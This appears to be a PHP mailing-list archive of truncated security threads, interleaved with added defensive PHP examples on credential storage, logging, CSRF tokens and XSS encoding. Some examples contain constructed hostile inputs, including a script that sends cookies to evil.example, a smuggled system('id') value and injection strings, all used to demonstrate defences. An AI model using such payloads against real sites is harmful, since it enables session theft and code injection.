On Wed, 15 Sep 2004 12:47:05 -0400, H. Ch. Esperer
[EMAIL PROTECTED] wrote:
I have Apache 1.3 and PHP 5.0.1 running on my machine and when I enter a URL in a
browser without a slash at the end of it I get the php script(!) instead of its
output. When I add a slash, it works all right.
Has
--- Dan Joseph [EMAIL PROTECTED] wrote:
I am in the process of wrapping up a site for a friend of mine.
It has logins, searching, account information, etc. I am
wondering, does anyone on the list do any security auditing on
the side? Chris, maybe you?
Yes, but I might not be a good choice,
Scott Fletcher wrote:
Saw a website about a security vulnerability and there's no info on php.net
that can describe more about it. So, anyone know?
http://pcworld.co.nz/news.nsf/0/4D6AE0157B37ACDCCC256ED200693BB3?OpenDocument
One more reason to not use strip_tags... like I really needed another,
John W. Holmes mailto:[EMAIL PROTECTED]
on Friday, May 28, 2004 11:25 PM said:
You're right. Option 2 offers more security in that no one will ever
be able to reach the file directly with a web browser. You don't need
to use file() or file_get_contents(), though... A simple
Chris W. Parker
on Tuesday, June 01, 2004 8:12 AM said:
how about just calling 'db.php' so that when someone does request it
via a web browser it will be parsed and end up not sending any data
to the client?
that should read, just calling *it* 'db.php', regarding the name of
the file
From: Chris W. Parker [EMAIL PROTECTED]
You're right. Option 2 offers more security in that no one will ever
be able to reach the file directly with a web browser. You don't need
to use file() or file_get_contents(), though... A simple
include('../includes/db.inc'); will work (where ../
John W. Holmes mailto:[EMAIL PROTECTED]
on Tuesday, June 01, 2004 8:29 AM said:
We'll call that Option 3, which is a viable option if you cannot do
Option 2 (store outside of webroot). The problem with this method is
that if PHP ever fails for any reason, the file may be delivered as
Dennis Seavers wrote:
Option 1: Include the mysql_connect and mysql_select_db
commands within the script that manipulates the data from
the database.
Option 2: Include the mysql_connect and mysql_select_db
commands (along with usernames and passwords) outside the
Web tree, but have the script
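To make Option 2 concrete, here is an added example that is not code from any poster in this thread: the credentials file lives outside the document root and is pulled in with an absolute path built from the running script's own directory, so the include is never resolved against include_path or another user's directory, and the file is never reachable by URL. The layout (/home/user/www as web root, /home/user/private/db.inc for the credentials), the array keys, and the use of mysqli in place of the thread's mysql_connect are all assumptions; __DIR__ needs PHP 5.3 or later.

```php
<?php
// Added example: load database credentials from a file OUTSIDE the web
// root (Option 2 above) using an absolute path.
// Assumed layout:  /home/user/www/index.php   (this script, in the web root)
//                  /home/user/private/db.inc  (credentials, never served)
// db.inc itself (assumed contents) is nothing but a return statement, e.g.
//   return ['host' => 'localhost', 'user' => 'app', 'pass' => '...', 'name' => 'app'];
// so it contains no HTML and produces no output even if mis-served.

function load_db_config(): array
{
    // __DIR__ is the directory of THIS file, so the result does not depend
    // on include_path, on the web server's cwd, or on another vhost's tree.
    $file = dirname(__DIR__) . '/private/db.inc';   // /home/user/private/db.inc
    $real = realpath($file);
    if ($real === false) {
        throw new RuntimeException('db config not found');
    }

    // Refuse to run if the file has ended up under the document root after
    // all (bad deploy): then a PHP outage could serve it as plain text.
    $docroot = realpath($_SERVER['DOCUMENT_ROOT'] ?? __DIR__);
    if ($docroot !== false && strpos($real, rtrim($docroot, '/') . '/') === 0) {
        throw new RuntimeException('db config must not be inside the web root');
    }

    // On a shared host, other accounts must not be able to read it (0600).
    if (fileperms($real) & 0044) {
        throw new RuntimeException('db config is group/world readable; chmod 600 it');
    }

    $cfg = require $real;   // db.inc is expected to `return [...]`
    foreach (['host', 'user', 'pass', 'name'] as $k) {
        if (!isset($cfg[$k])) {
            throw new RuntimeException("db config missing '$k'");
        }
    }
    return $cfg;
}

$cfg = load_db_config();
$db  = new mysqli($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['name']);
```

The permission and document-root checks are cheap and turn a silent misconfiguration into a hard failure at startup, which is the failure mode you want for credentials.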
From: Andy B [EMAIL PROTECTED]
I'm writing this admin system for a website and need to have it write system
logs to its own log files... the only problem I can really see is that it's
on a shared webserver and all files are restricted to your own domain/vhost
dirs (whatever those happen to be).
You don't have access to anything outside of the webroot? If /home/user/www/
is your webroot, then write them to /home/user/. If you're saying you can't
do that and they have to be put under the webroot, then give them .php
extensions and make the first line
<?php exit(); ?>
Then they can't
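An added example of the fallback described above (not code from the thread): the log file gets a .php extension and "<?php exit(); ?>" as its first line, so a direct request executes exit() before any log content is reached. The path is an assumption. Two things the example adds that the reply does not spell out: the file is created with mode 0600, and each entry is written as one JSON line so that a user-supplied value containing a newline cannot forge a second entry. The caveat from the same thread still applies: if PHP ever stops handling .php files, the log is served as text, so a directory outside the web root remains the better option whenever the host allows it.

```php
<?php
// Added example: append to an application log that must live under the
// web root. First line is a PHP guard so a direct HTTP request yields
// nothing. LOG_FILE location is an assumption.

const LOG_FILE  = __DIR__ . '/logs/admin-log.php';
const LOG_GUARD = "<?php exit(); ?>\n";

function app_log(string $event, array $fields = []): void
{
    $dir = dirname(LOG_FILE);
    if (!is_dir($dir)) {
        mkdir($dir, 0700, true);
    }
    $fh = fopen(LOG_FILE, 'a');          // append mode: writes always go to the end
    if ($fh === false) {
        return;                          // never let logging break the request
    }
    flock($fh, LOCK_EX);
    if (fstat($fh)['size'] === 0) {
        fwrite($fh, LOG_GUARD);          // first line of a fresh file
        chmod(LOG_FILE, 0600);           // other accounts on the host cannot read it
    }
    // One JSON object per line. json_encode escapes \n and \r, so a
    // hostile value cannot inject a fake entry or break the line format.
    $entry = [
        'ts'    => gmdate('c'),
        'event' => $event,
        'ip'    => $_SERVER['REMOTE_ADDR'] ?? 'cli',
    ] + $fields;
    fwrite($fh, json_encode($entry, JSON_UNESCAPED_SLASHES) . "\n");
    flock($fh, LOCK_UN);
    fclose($fh);
}

// Constructed sample input with a deliberately hostile username: it lands
// in the file as an escaped JSON string, after the exit() guard line.
app_log('login_failed', ['user' => "admin\n<?php system('id');"]);
```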
On 20 February 2004 22:29, Ed Lazor wrote:
PHP include statements default to the current directory. If
the path to
my PHP files is /home/osmosis/public_html, why would users visiting my
site occasionally get an error that the include file wasn't found in
/home/budguy/public_html?
It's
Ed Lazor mailto:[EMAIL PROTECTED]
on Friday, February 20, 2004 2:29 PM said:
It's like PHP is somehow confused and running my script with the
account settings (and permissions, possibly) for another user on my
host provider's server. If that's true, wouldn't this quality as a
security
You're not being rude. I contacted them immediately about the script
errors and described what seemed to be a security hole. The tech I
spoke with didn't know what I was talking about, so I asked them to
notify the owner of the problem and that I'd research it more and let
them know of anything
Hi Chris,
First of all, thanks a lot for sharing your modus operandi with us.
On 14 Jan 2004 at 7:32, Chris W wrote:
I then verify that every character in the string is within the ASCII
range of a space to the ~ which is basically all the characters on the
keyboard.
How exactly are you
[EMAIL PROTECTED] wrote:
Hi Chris,
First of all, thanks a lot for sharing your modus operandi with us.
On 14 Jan 2004 at 7:32, Chris W wrote:
I then verify that every character in the string is within the ASCII
range of a space to the ~ which is basically all the characters on the
keyboard.
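The check Chris describes, as an added example that is not his code: every byte must lie in the printable ASCII range 0x20 (space) to 0x7E (tilde). The constructed inputs show what it stops (CR/LF, NUL, non-ASCII) and what it deliberately lets through: quotes and angle brackets are printable, so this is an input-sanity filter, not a substitute for escaping at the SQL or HTML sink.

```php
<?php
// Added example: accept a string only if every byte is printable ASCII.

function is_printable_ascii(string $s): bool
{
    // \A and \z anchor to the absolute start/end; a plain $ would still
    // match a string with a trailing newline.
    return preg_match('/\A[\x20-\x7E]*\z/', $s) === 1;
}

function is_printable_ascii_loop(string $s): bool
{
    // Same rule written out byte by byte, to make the range explicit.
    for ($i = 0, $n = strlen($s); $i < $n; $i++) {
        $c = ord($s[$i]);
        if ($c < 0x20 || $c > 0x7E) {
            return false;
        }
    }
    return true;
}

// Constructed inputs: expected verdict for each.
$cases = [
    "alice"                     => true,   // plain keyboard text
    "Bob\r\nBcc: x@y"           => false,  // CR/LF: blocks header and log injection
    "name\0.txt"                => false,  // NUL byte
    "caf\xc3\xa9"               => false,  // UTF-8 'e acute': ASCII-only by design
    "' OR 1=1 --"               => true,   // printable, so NOT an SQL defence
    "<script>alert(1)</script>" => true,   // printable, so NOT an HTML defence
];
foreach ($cases as $input => $expected) {
    if (is_printable_ascii($input) !== $expected || is_printable_ascii_loop($input) !== $expected) {
        throw new RuntimeException('unexpected verdict for ' . json_encode($input));
    }
}
echo "all cases as expected\n";
```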
On Thu, 18 Dec 2003 10:43:14 -0500, you wrote:
I'm trying to develop a secure web based application and my only tools are
php, mysql, and a SSL connection.
Does anyone know of any good references for this kind of development?
What I really need to do is to make sure that given users only gain
If you want this level of security, you should work under an SSL connection, which
works with encrypted data between browser and server.
Javier Tacón
-Original Message-
From: Neale Yates [mailto:[EMAIL PROTECTED]
Sent: Monday, 15 September 2003 7:47
To: [EMAIL PROTECTED]
Nabil [EMAIL PROTECTED] wrote:
I have an Linux server running Apache/PHP/MySQL.
and I need to connect to another server running MSSQL server 7
THE POINT IS the only way I have to connect is through an ODBC connection
because the network administrator only allowed me to connect through port 1433
Justin,
Thanks for your reply -- you're partially correct in how it works, and thus
far I've not used session id's. Cool.
Login is built into the Flash movie and calls a PHP script to authenticate,
which returns appropriate success/fail data to the movie. Everything is
buried in the Flash movie
Ok, I'm trying to get a grip on what happens here:
1. i visit your site, see a flash movie, which enables me to log-in
2. after i log in, I see a link called news
3. I click on it, which pops open a HTML window through javascript, with a
URL like example.com/print_news.php
[At this point, the
It should not be too difficult to change the delphi utility to post a
sql or csv file to a php script, in the script you can check the sql
commands and then execute them or parse the csv file respectively. The
password is not really hidden, maybe it is not even scrambled in the
binary, and can
Thanks. Looks like a properly configured safe mode could eliminate a
lot of problems. A few follow-up questions:
1. I see in the PHP doc comments a patch for Apache
(http://luxik.cdi.cz/~devik/apache/) that runs different virtual hosts
as different users. Anyone know anything about it, in
OK, my question #2 below is answered by the docs: Safe mode disabled
the backtick operator. But having turned on safe mode on my local test
server, I have another question: Suddenly my include statements that
use relative paths don't work. For example:
include
If your hosting provider has enabled safe mode then others can not
include scripts that have a different uid than the owner of the current
script, that prevents them from including your code.
As far as the files go you could checksum them or if you are honestly
concerned about them being changed
Remove me from your list
-Original Message-
From: Jani Taskinen [mailto:[EMAIL PROTECTED]]
Sent: Monday, February 17, 2003 12:01 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: PHP Security Advisory: CGI vulnerability in PHP version 4.3.0
-BEGIN PGP SIGNED
On Mon, 17 Feb 2003, McKinney, Rod ERM wrote:
Remove me from your list
See the footer of this email:
--
PHP Development Mailing List http://www.php.net/
To unsubscribe, visit: http://www.php.net/unsub.php
Derick
--
Stop mad cowboy disease!
Ananth Kesari [EMAIL PROTECTED] wrote... :
Thanks for your inputs. Will proceed from here.
Well, if you did not know, NetWare is an operating system brought out
by Novell.
I know :)
We are working on porting PHP onto NetWare. In fact, we
already have ported PHP 4.2.3 onto NetWare and
Ananth Kesari [EMAIL PROTECTED] wrote... :
I am working on porting PHP onto NetWare.
What exactly do you mean?
I am a newbie to Unix / Linux systems and at this point of time, I am
trying to understand the way security is implemented for PHP on Unix /
Linux. I mean, how are the different
Ananth,
For starters, you are probably on the wrong list - the PHP developers list
is probably where you should be asking this question.
Second, PHP runs through the web server, so the user is the same user as the
web server, usually nobody, although that depends on how the web
server is
--- Miles Thompson [EMAIL PROTECTED] wrote:
Ananth,
For starters, you are probably on the wrong list -
the PHP developers list is probably where you should
be asking this question.
Please do not go around saying this. We have enough
problems with these types of posts winding up on php-dev
Thanks for your inputs. Will proceed from here.
Well, if you did not know, NetWare is an operating system brought out
by Novell. We are working on porting PHP onto NetWare. In fact, we
already have ported PHP 4.2.3 onto NetWare and we have synched up our
sources for the 4.3 branch.
Thanks,
Thanks for your inputs. Will proceed from here.
Well, I first posted this query on this list. But seeing no response, I
thought probably it should have gone into PHP-dev list. When I posted
there, I was discouraged to post such mails there. So, I came back to
the general list.
Thanks,
Ananth.
I guess you use some webserver, let's take Apache.
Apache's mime.conf sets several extensions,
including PHP extensions. So only .php, .php3, .php4
files will be parsed by PHP.
Chad Day wrote:
I want to give my users the ability to submit a URL to a database, then when
they pull up their page,
--- Chad Day [EMAIL PROTECTED] wrote:
I want to give my users the ability to submit a URL
to a database, then when they pull up their page,
their photo is included .. what I'm worried about
is them pointing the link to some malicious code or
something..
Your instincts serve you well.
There
Chris Shiflett wrote:
--- Chad Day [EMAIL PROTECTED] wrote:
I want to give my users the ability to submit a URL
to a database, then when they pull up their page,
their photo is included .. what I'm worried about
is them pointing the link to some malicious code or
something..
Your instincts
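An added example for Chad's case, not code from Chris Shiflett's reply: the submitted URL is treated strictly as data. It is validated, stored, and later written into an <img src> attribute with escaping; it is never passed to include(), fopen() or file_get_contents() on the server, which is where "pointing the link to some malicious code" would actually bite. The allow-list of schemes, the length limit, and the private-address check (relevant only if the server will ever fetch the image itself) are my choices, not anything the thread specifies.

```php
<?php
// Added example: validate a user-supplied image URL and emit it safely.

function validate_image_url(string $url): ?string
{
    $url = trim($url);
    if ($url === '' || strlen($url) > 2048 || !filter_var($url, FILTER_VALIDATE_URL)) {
        return null;
    }
    $p = parse_url($url);
    // Only web schemes. Rejects javascript:, data:, file:, php://, ftp://.
    if (!isset($p['scheme'], $p['host'])
        || !in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (isset($p['user']) || isset($p['pass'])) {   // no http://user:pw@host tricks
        return null;
    }
    // If the server will ever fetch this URL (thumbnails, size checks), do
    // not let the field point at loopback or RFC1918 space. A hostname that
    // resolves to such an address is not caught here; resolve and re-check
    // immediately before fetching.
    if (filter_var($p['host'], FILTER_VALIDATE_IP)
        && !filter_var($p['host'], FILTER_VALIDATE_IP,
                       FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        return null;
    }
    return $url;
}

function img_tag(string $url): string
{
    // Attribute escaping: a " in the value becomes &quot;, so the attacker
    // cannot close the attribute and add onerror="..." of their own.
    return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
}

// Constructed inputs
$samples = [
    'https://example.com/me.jpg',      // accepted
    'javascript:alert(1)',             // no host, wrong scheme: rejected
    'data:text/html,<script>',         // rejected
    'ftp://example.com/x.gif',         // scheme not allowed: rejected
    'http://127.0.0.1/admin',          // loopback: rejected
];
foreach ($samples as $s) {
    $ok = validate_image_url($s);
    echo str_pad($s, 32) . ' => ' . ($ok === null ? 'rejected' : img_tag($ok)) . "\n";
}
```

Whatever the validator accepts, the browser will still only render it as an image; what the validator mainly buys you is that a stored value can never be reused by some later piece of server-side code that does fetch or include it.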
On Wednesday 22 January 2003 01:40, Sean Burlington wrote:
is there really any site which will accept a book order based on a single
GET ?
Amazon makes a big deal of their one-click shopping feature. It's so good
they've even patented it.
--
Jason Wong - Gremlins Associates -
Gibbs, Liam - SXIA wrote:
I agree that there are risks - but I do think this can be done safely
Couldn't you just check the submitted URL and find out if it's a gif or
jpeg? I don't think even PHP-enabled servers will run a gif or jpeg.
please send replies to the list ...
and you cant
--- Sean Burlington [EMAIL PROTECTED] wrote:
I'm not sure what harm could be done by this though.
if a browser attempts to load an image referenced by
an img tag - but finds an unsuitable type of data -
I would expect it simply to ignore it...
I sent a response about this earlier, but you
--- Sean Burlington [EMAIL PROTECTED] wrote:
is there really any site which will accept a book
order based on a single GET?
Well, yes, but that is not the point really. The example of
the img tag is just one way you can forge an HTTP request
from another user (the victim).
Also consider that
Chris Shiflett wrote:
--- Sean Burlington [EMAIL PROTECTED] wrote:
I'm not sure what harm could be done by this though.
if a browser attempts to load an image referenced by
an img tag - but finds an unsuitable type of data -
I would expect it simply to ignore it...
I sent a response about
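The defence against the forged request Chris describes, as an added example that is not from the thread: the victim's browser attaches its cookies to any request it is tricked into making, so the server additionally demands a secret that the attacker's page cannot read, carried in the POST body and tied to the session. State-changing actions are POST only, because an <img src="..."> or a pasted link can only ever issue a GET. random_bytes() and hash_equals() need PHP 7.0 or later; the form fields are assumed.

```php
<?php
// Added example: per-session CSRF token for a one-click style order form.

session_start();

function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));   // 256-bit, unguessable
    }
    return $_SESSION['csrf'];
}

function csrf_field(): string
{
    return '<input type="hidden" name="csrf" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_check(): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        http_response_code(405);
        exit('POST required');
    }
    $sent = $_POST['csrf'] ?? '';
    // is_string first: csrf[]=x would otherwise reach hash_equals as an array.
    // hash_equals compares in constant time, so there is no timing oracle.
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
}

// Render the form on GET
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'GET') {
    echo '<form method="post" action="">', csrf_field(),
         '<input type="hidden" name="isbn" value="0000000000">',   // assumed field
         '<button>Order</button></form>';
    exit;
}

// Process the order on POST, only after the token check passes
csrf_check();
// ... place the order for $_POST['isbn'] here
```

Marking the session cookie SameSite=Lax (session_set_cookie_params, PHP 7.3+) is a useful second layer, since the browser then omits the cookie from cross-site POSTs altogether, but the token is what works in every browser.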
--- Phil Ewington [EMAIL PROTECTED] wrote:
Can PHP be configured to allow certain web sites
access to files and directories within their web
root only?
I would suggest looking into safe mode. It sounds like it
may work for you:
http://www.php.net/manual/en/features.safe-mode.php
Chris
--
True. But let's just call me anal retentive. :-) Let's say I didn't have the
option of doing what you suggested. Are my ideas sound? Also, those ideas
apply to top-level PHP scripts in an application.
Jacob
Kevin Stone [EMAIL PROTECTED] wrote in message
--- Jacob Copsey [EMAIL PROTECTED] wrote:
My style of PHP is to name all included files with a .php
extension and of course this raises the problem of people
accessing these script files directly.
I always name included files *.inc myself, but that's a
personal preference combined with a
I agree these are good solutions and I have considered them. However, I am
looking for an all-inclusive solution that is code only within PHP that
allows the admin of the application to copy the files to their server and
not need to do any server specific configuration. That is why I don't name
Have you thought about moving your include files outside of the web
directory?
i.e.If your site is in ../apache/htdocs/web/mywbsite_folder
then move your include files to ../apache/my_include_folder/ or something
similar.
-john
=P e p i e D e s i g n s
www.pepiedesigns.com
Providing
--- Jacob Copsey [EMAIL PROTECTED] wrote:
I agree these are good solutions and I have considered
them. However, I am looking for an all-inclusive
solution that is code only within PHP that allows the
admin of the application to copy the files to their
server and not need to do any server
-Original Message-
From: Jacob Copsey [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, January 15, 2003 3:53 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Security in included PHP files
I agree these are good solutions and I have considered them. However,
I am
looking for an all
I am beginning work on a new web-based application using PHP and MySQL. I
have been doing a lot of reading about PHP security and web application
security in general to make sure I am up-to-date on what is known in this
area.
My style of PHP is to name all included files with a .php
Message-
From: Jacob Copsey [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, January 15, 2003 3:53 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Security in included PHP files
I agree these are good solutions and I have considered them. However,
I am
looking for an all-inclusive
On Sunday 05 January 2003 01:16, Anders Thoresson wrote:
I've seen both guest books and user forums hacked by users who enter
javascript or other code, and that way redirect visitors to other sites or
do other unwelcome things. What expressions should I look for and not allow
in my forms?
on 05/01/03 4:16 AM, Anders Thoresson ([EMAIL PROTECTED]) wrote:
I've seen both guest books and user forums hacked by users who enter
javascript or other code, and that way redirect visitors to other sites or
do other unwelcome things. What expressions should I look for and not allow
in my
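An added example for Anders' question, not code from any reply in the thread: rather than hunting for bad expressions in what users type, store the text as-is and encode it at the point where it is written into HTML, so a <script> tag becomes visible text. The one place encoding alone is not enough is a user-supplied link, because href="javascript:..." is a perfectly well-encoded attribute, so the link gets a scheme allow-list as well. The entry fields and the two hostile entries are constructed.

```php
<?php
// Added example: render guest-book entries with output encoding.

header('Content-Type: text/html; charset=UTF-8');

function h(string $s): string
{
    // ENT_QUOTES escapes both ' and ", so the value is safe inside attributes;
    // ENT_SUBSTITUTE keeps invalid UTF-8 from turning the output into "".
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function safe_href(string $url): ?string
{
    $p = parse_url(trim($url));
    if (!isset($p['scheme'], $p['host'])
        || !in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return null;             // javascript:, data:, vbscript: all dropped here
    }
    return $url;
}

function render_entry(array $e): string
{
    $name = h($e['name']);
    $link = safe_href($e['site'] ?? '');
    if ($link !== null) {
        $name = '<a href="' . h($link) . '" rel="nofollow noopener">' . $name . '</a>';
    }
    // nl2br AFTER escaping: the <br> tags are ours, any the user typed stay literal
    return '<div class="entry"><b>' . $name . '</b><p>' . nl2br(h($e['text'])) . "</p></div>\n";
}

// Constructed hostile entries
$entries = [
    ['name' => 'mallory',
     'site' => 'javascript:alert(document.cookie)',
     'text' => "<script>location='http://evil.example/?'+document.cookie</script>"],
    ['name' => '"><img src=x onerror=alert(1)>',
     'site' => 'https://example.com/',
     'text' => "Nice site!\nKeep it up."],
];
foreach ($entries as $e) {
    echo render_entry($e);
}
// The first entry shows &lt;script&gt;... as text and loses its link; the
// second shows the literal quote/angle-bracket string as the visible name.
```

If you later decide to allow a subset of markup (bold, links), do it with a parser that rebuilds the HTML from an allow-list of tags and attributes, not with a blacklist of "dangerous expressions", which is exactly the approach that keeps failing.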
Hi gamin,
Running Red Hat 7.2, PHP 4.0.6. Is there any way of knowing if a certain
PHP script was run from the command line, shell script or through the
webserver (Apache). Maybe I could check the user calling the script and
find out but how would I do that?
There is a difference in
Hello,
SED [EMAIL PROTECTED] wrote:
When I use sessions in PHP or just plain login/password in $_POST, can
3rd parties or hackers monitor the transmission, between me and user,
and somehow decode the transmission and use the variables to login other
time or overtake the current session?
Yes.
Yes,
Between user and server, all data passes through DNS, routers, etc...
So if you don't want someone (hackers or the FBI or CIA) to decode your data,
use an SSL server (https://) with a certificate-
- Original Message -
From: SED [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, November
Thank you for the reply, what do you mean by sniffing, do you mean
everybody can monitor our browsing?
-Original Message-
From: @ Edwin [mailto:copperwalls;hotmail.com]
Sent: 1 November 2002 21:47
To: SED
Cc: [EMAIL PROTECTED]
Subject: Re: [PHP] Security - Maybe a silly question
Hello
: [EMAIL PROTECTED]
website: www.sed.is
-Original Message-
From: rija [mailto:rija;vatu.com]
Sent: 1 November 2002 22:33
To: php; SED
Subject: Re: [PHP] Security - Maybe a silly question
Yes,
Between user and server, all data passes through DNS, routers, etc... So
if you don't want
Hello SED,
SED [EMAIL PROTECTED] wrote:
Thank you for the reply, what do you mean by sniffing, do you mean
everybody can monitor our browsing?
I'm not really sure how I can answer your question but let me just put it
this way.
Everybody CAN monitor our browsing but:
1. That doesn't mean
SED [EMAIL PROTECTED] wrote:
I'm not very familiar with this stuff, but if I want to use https://,
don't I need a key from Verisign (or similar) to make it work?
Yes and no. If you're going to use it on a production server, yes.
If it's on a test server but you still want to be somehow
SED wrote:
When I use sessions in PHP or just plain login/password in $_POST, can
3rd parties or hackers monitor the transmission, between me and user,
and somehow decode the transmission and use the variables to login other
time or overtake the current session?
If so, how likely is for someone
Having recently switched from php 4.0.0 to 4.2.3 I quickly realized the
change in variable handling. I still experience problems using the $_POST
and $_GET globals so I currently have my register globals ON so I can have
the ability to pass variables from page to page without using the $_POST
Correct! Problem is that I have been given explicit instructions to not
use cookies to do this. The only way I can think of doing it without
using cookies is to pass at least one variable from page to page so the
scripts know who the user is. Getting them to the user index page with
links to
Correct! Problem is that I have been given explicit instructions to not
use cookies to do this. The only way I can think of doing it without
using cookies is to pass at least one variable from page to page so the
scripts know who the user is. Getting them to the user index page with
links
It would be possible to do this if I then created another table to load
their profile data to and use the unique id as the identifier. It would
make it a lot harder for someone to guess an ID. I would then need a way to
flush out their records from the second table when they are finished.
Easily
It would be possible to do this if I then created another table to load
their profile data to and use the unique id as the identifier. It would
make it a lot harder for someone to guess an ID. I would then need a way to
flush out their records from the second table when they are finished.
I think I would rather do it using a new table than have to handle
sessions. It actually sounds harder to do it this way but I like hard. :)
Thanks,
Ed
On Mon, 30 Sep 2002, John W. Holmes wrote:
It would be possible to do this if I then created another table to
load
their profile data
At 04:12 PM 8/12/2002 +0100, Pag wrote:
Here is my humble, but relatively effective solution for a low security site.
Create a file called security.php and require it at the head of every
secure page. This is the one I use.
<?php
session_start();
if (!session_is_registered('userinfo'))
{
    // (the rest of the check is cut off in the original post)
}
If it's simple security then you might want to use an .htaccess file instead
of coding something.
More complex solutions involve asking the user for credentials, validating
those credentials and then storing something in the $_SESSION that indicates
that this user has been validated.
It can be
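An added example of the gate that Pag's security.php and the reply above both describe, written against today's $_SESSION rather than session_is_registered(); it is not either poster's code. It assumes the login handler stores an integer user id in $_SESSION['uid'] after a successful password check, and a 30-minute idle timeout is an assumed policy. The array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added example: require_login() goes at the top of every protected page;
// mark_logged_in() is called by the (assumed) login handler on success.

function require_login(string $login_url = '/login.php'): int
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // Cookie flags: not readable from JS, TLS only, not sent cross-site.
        session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
        session_start();
    }
    $uid = $_SESSION['uid'] ?? null;
    if (!is_int($uid) || $uid <= 0) {
        $_SESSION['after_login'] = $_SERVER['REQUEST_URI'] ?? '/';   // return here afterwards
        header('Location: ' . $login_url, true, 303);
        exit;
    }
    // Idle timeout (assumed: 30 minutes). A stolen session id goes stale.
    if (time() - ($_SESSION['last_seen'] ?? 0) > 1800) {
        $_SESSION = [];
        session_destroy();
        header('Location: ' . $login_url, true, 303);
        exit;
    }
    $_SESSION['last_seen'] = time();
    return $uid;
}

function mark_logged_in(int $uid): void
{
    // New session id on privilege change: the id the browser had before
    // login (possibly planted by an attacker) is no longer valid.
    session_regenerate_id(true);
    $_SESSION['uid']       = $uid;
    $_SESSION['last_seen'] = time();
}

function logout(): void
{
    $_SESSION = [];
    session_destroy();
    setcookie(session_name(), '', time() - 3600, '/');
}

// Protected page:
$uid = require_login();
echo 'hello user ' . $uid;
```

The .htaccess route mentioned in the reply is fine when the only requirement is "some password on this directory"; the moment you need per-user data or a logout button, the session flag plus regenerate-on-login above is the minimum.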
On Fri, Aug 09, 2002 at 10:10:28PM +0200, Andy wrote:
[curl]
So I fear that someone would be able to transfer files on / off my server.
Has anybody some experience on that, or can give a comment on that?
Ehhh, PHP already has enough capabilities to transfer files to/from your
server from/to
So I fear that someone would be able to transfer files on / off my server.
Has anybody some experience on that, or can give a comment on that?
Ehhh, PHP already has enough capabilities to transfer files to/from your
server from/to the rest of the world without using curl. Or are you
On Wed, 24 Jul 2002, Scott Fletcher wrote:
It works very nicely. The whole process takes 30 to 45 minutes for just
one server. I wonder how someone did 12 computers in 10 minutes.
Cool!
cd /usr/src/local
tar -zxf php-4.2.2.tar.gz
cd php-4.2.2
../php-4.2.1/config.nice
make
Hmmm, interesting I didn't know about this and didn't see it in the
docs. So now I know for my next upgrade.
Anyway, my upgrade is in, and through the mails it should be clear to those
who thought how terribly difficult and time consuming it is/was to do the
upgrades that it was in fact
ay, July 23, 2002 12:43 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security Advisory: Vulnerability
in PHP versions 4.2.0
I don't know how to apply patches to the PHP software. I just finished
upgrading the website to work with PHP 4.2.1 from PHP 4.0.6. And now
this
From: Scott Fletcher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, July 23, 2002 12:43 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security Advisory: Vulnerability
in PHP versions 4.2.0
I don't know how to apply patches to the PHP software. I just finished
u
On Wednesday 24 July 2002 22:22, Scott Fletcher wrote:
It works very nicely. The whole process takes 30 to 45 minutes for just
one server.
You've got a slow computer and/or you type too slow ;-)
I wonder how someone did 12 computers in 10 minutes.
Cool!
For me it was a case of
At 10:22 AM 7/24/02 -0400, Scott Fletcher wrote:
It works very nicely. The whole process takes 30 to 45 minutes for just
one server. I wonder how someone did 12 computers in 10 minutes.
Cool!
For me the key to upgrading many servers is to compile once then copy the
resulting files to
I don't know how to apply patches to the PHP software. I just finished
upgrading the website to work with PHP 4.2.1 from PHP 4.0.6. And now
this. So, just patch it, then configure openssl, mcrypt, curl, modssl,
then do the usual stuff for PHP then apache, right??
Adam Alkins [EMAIL
Amended to this recent posting. Already started a new posting from scratch.
Scott Fletcher [EMAIL PROTECTED] wrote in message
news:[EMAIL PROTECTED]...
I don't know how to apply patches to the PHP software. I just finished
upgrading the website to work with PHP 4.2.1 from PHP
From: Scott Fletcher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, July 23, 2002 12:43 PM
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security Advisory: Vulnerability
in PHP versions 4.2.0
I don't know how to apply patches to the PHP software. I just finished
upgrading the website
Ian Ball [EMAIL PROTECTED] wrote in message
news:[EMAIL PROTECTED]...
patch -p0 < php-4.2.1-to-4.2.2.patch
cd php-4.2.1
./configure --with-mysql --with-apxs=/usr/local/apache/bin/apxs --with-ldap
make
make install
/usr/local/apache/bin/apachectl restart
Hmm...is the
If all you're doing is applying the patch (not adding/removing any
extensions), you should be able to use
./config.nice
which will use all of the configuration commands from your last compile
(This is an extremely handy thing if your GD/Freetype setup was particularly
ornery the first time
The correct path for the windows binary version is
http://www.php.net/do_download.php?download_file=php-4.2.2-Win32.zip
/lasso ([EMAIL PROTECTED])
Rouvas Stathis wrote:
Hi all,
Just wanting to notify everyone that
the link for the PHP.4.2.2 download is broken.
-Stathis.
--
PHP
Can you post this to php.announce as well?
Marko Karppinen wrote:
